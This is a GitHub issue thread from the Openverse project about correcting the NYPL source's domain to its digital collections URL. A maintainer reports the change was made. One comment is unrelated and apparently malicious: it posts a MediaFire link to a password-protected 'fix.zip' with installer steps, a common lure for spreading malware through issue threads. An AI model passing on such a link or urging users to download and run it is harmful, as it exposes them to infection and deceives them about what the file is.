### ISSUE TITLE
Update the NYPL `domain` in the API

### ISSUE THREAD

**Issue by obulat** [WordPress/openverse#4806]
## Description

The NYPL collections Content Source `domain` should be "https://digitalcollections.nypl.org/", not "nypl.org"

## Additional context

https://openverse.org/sources links to the main NYPL URL, and it's very difficult to find the landing page for media collection

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by krysal** [comment]
Updated on the admin.
